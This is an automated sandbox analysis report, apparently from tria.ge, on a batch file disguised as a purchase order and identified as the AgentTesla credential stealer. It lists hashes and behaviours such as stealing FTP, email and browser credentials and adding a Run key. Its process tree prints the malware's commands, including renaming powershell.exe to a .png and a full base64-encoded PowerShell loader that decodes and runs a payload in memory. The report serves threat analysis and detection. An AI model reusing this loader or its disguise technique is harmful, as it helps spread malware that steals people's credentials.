Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    140s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/10/2023, 19:51

General

  • Target

    P.O 2023-69415002.bat

  • Size

    1018KB

  • MD5

    e4e1075b03f102d9d07619194b7e5fbb

  • SHA1

    ef833d4052c3efff9315c8f2845c2d5e20f7165f

  • SHA256

    b78cf80d94f017c5f389590f2f3b312f1694d93e5e6aebf296e46b5b9dbca2da

  • SHA512

    1faffae63d7e4731ecc30b1c02f60625632d5c2cc9944dc2870acf75fcb50bd66cd32f893f68a2400bdd21f06da6086a760c3b654969829114c857faeaeb432e

  • SSDEEP

    24576:/qfa722mM+vmWw3/MzxW2LhbOTx61lx6ULpzF:ku+HxVbOVyT

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Executes dropped EXE 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\P.O 2023-69415002.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1260
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\P.O 2023-69415002.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:400
      • C:\Windows\system32\xcopy.exe
        xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Eoqrexflxja.png
        3⤵
          PID:4184
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo F "
          3⤵
            PID:2644
          • C:\Windows\system32\xcopy.exe
            xcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\P.O 2023-69415002.bat" C:\Users\Admin\AppData\Local\Temp\Eoqrexflxja.png.bat
            3⤵
              PID:2956
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo F "
              3⤵
                PID:396
              • C:\Users\Admin\AppData\Local\Temp\Eoqrexflxja.png
                C:\Users\Admin\AppData\Local\Temp\Eoqrexflxja.png -win 1 -enc JABVAGQAbwByAGoAbgBhAHEAIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQAQwB4AGkAcwBmAGYAZgBzAG8AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVQBkAG8AcgBqAG4AYQBxACkAOwAkAFgAeQB4AGcAaQB0AGIAcAB4AG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEMAeABpAHMAZgBmAGYAcwBvACAAKQA7ACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFkAcQBqAHoAdgBuAHQAZQB1AHoAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAWAB5AHgAZwBpAHQAYgBwAHgAbgAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAWQBxAGoAegB2AG4AdABlAHUAegAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAWQBxAGoAegB2AG4AdABlAHUAegAuAEMAbABvAHMAZQAoACkAOwAkAFgAeQB4AGcAaQB0AGIAcAB4AG4ALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABDAHgAaQBzAGYAZgBmAHMAbwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABDAHgAaQBzAGYAZgBmAHMAbwApADsAIAAkAEQAcQBpAGMAeABrAGkAagBxAGIAZAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABDAHgAaQBzAGYAZgBmAHMAbwApADsAIAAkAEIAcwBsAHQAbgAgAD0AIAAkAEQAcQBpAGMAeABrAGkAagBxAGIAZAAuAEcAZQB0AEUAeABwAG8AcgB0AGUAZABUAHkAcABlAHMAKAApAFsAMABdADsAIAAkAEkAawB4AHUAdgBsAGUAaABpAGIAIAA9ACAAJABCAHMAbAB0AG4ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQBbADAAXQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
                3⤵
                • Executes dropped EXE
                • Accesses Microsoft Outlook profiles
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • outlook_office_path
                • outlook_win_path
                PID:4136

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\Eoqrexflxja.png

            Filesize

            423KB

            MD5

            c32ca4acfcc635ec1ea6ed8a34df5fac

            SHA1

            f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

            SHA256

            73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

            SHA512

            6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

          • C:\Users\Admin\AppData\Local\Temp\Eoqrexflxja.png.bat

            Filesize

            1018KB

            MD5

            e4e1075b03f102d9d07619194b7e5fbb

            SHA1

            ef833d4052c3efff9315c8f2845c2d5e20f7165f

            SHA256

            b78cf80d94f017c5f389590f2f3b312f1694d93e5e6aebf296e46b5b9dbca2da

            SHA512

            1faffae63d7e4731ecc30b1c02f60625632d5c2cc9944dc2870acf75fcb50bd66cd32f893f68a2400bdd21f06da6086a760c3b654969829114c857faeaeb432e

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tb1bcn1e.fyi.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/4136-29-0x0000000002620000-0x0000000002630000-memory.dmp

            Filesize

            64KB

          • memory/4136-31-0x0000000006190000-0x00000000061AA000-memory.dmp

            Filesize

            104KB

          • memory/4136-12-0x0000000004CA0000-0x0000000004CC2000-memory.dmp

            Filesize

            136KB

          • memory/4136-13-0x0000000005480000-0x00000000054E6000-memory.dmp

            Filesize

            408KB

          • memory/4136-19-0x0000000005660000-0x00000000056C6000-memory.dmp

            Filesize

            408KB

          • memory/4136-10-0x0000000002670000-0x00000000026A6000-memory.dmp

            Filesize

            216KB

          • memory/4136-24-0x00000000057D0000-0x0000000005B24000-memory.dmp

            Filesize

            3.3MB

          • memory/4136-25-0x0000000005C70000-0x0000000005C8E000-memory.dmp

            Filesize

            120KB

          • memory/4136-26-0x0000000005F60000-0x0000000005FAC000-memory.dmp

            Filesize

            304KB

          • memory/4136-9-0x0000000002620000-0x0000000002630000-memory.dmp

            Filesize

            64KB

          • memory/4136-28-0x00000000750F0000-0x00000000758A0000-memory.dmp

            Filesize

            7.7MB

          • memory/4136-8-0x00000000750F0000-0x00000000758A0000-memory.dmp

            Filesize

            7.7MB

          • memory/4136-30-0x0000000007290000-0x000000000790A000-memory.dmp

            Filesize

            6.5MB

          • memory/4136-11-0x0000000004D20000-0x0000000005348000-memory.dmp

            Filesize

            6.2MB

          • memory/4136-32-0x0000000006C10000-0x0000000006CDA000-memory.dmp

            Filesize

            808KB

          • memory/4136-33-0x0000000006CE0000-0x0000000006D5A000-memory.dmp

            Filesize

            488KB

          • memory/4136-34-0x0000000006E60000-0x0000000006EC6000-memory.dmp

            Filesize

            408KB

          • memory/4136-36-0x0000000002620000-0x0000000002630000-memory.dmp

            Filesize

            64KB

          • memory/4136-37-0x0000000007130000-0x0000000007176000-memory.dmp

            Filesize

            280KB

          • memory/4136-38-0x0000000007200000-0x0000000007242000-memory.dmp

            Filesize

            264KB

          • memory/4136-39-0x0000000002620000-0x0000000002630000-memory.dmp

            Filesize

            64KB

          • memory/4136-40-0x0000000002620000-0x0000000002630000-memory.dmp

            Filesize

            64KB

          • memory/4136-41-0x0000000007EC0000-0x0000000008464000-memory.dmp

            Filesize

            5.6MB

          • memory/4136-42-0x0000000007E20000-0x0000000007E70000-memory.dmp

            Filesize

            320KB

          • memory/4136-43-0x0000000008510000-0x00000000085A2000-memory.dmp

            Filesize

            584KB

          • memory/4136-44-0x0000000007E90000-0x0000000007E9A000-memory.dmp

            Filesize

            40KB

          • memory/4136-45-0x0000000002620000-0x0000000002630000-memory.dmp

            Filesize

            64KB

          • memory/4136-46-0x0000000002620000-0x0000000002630000-memory.dmp

            Filesize

            64KB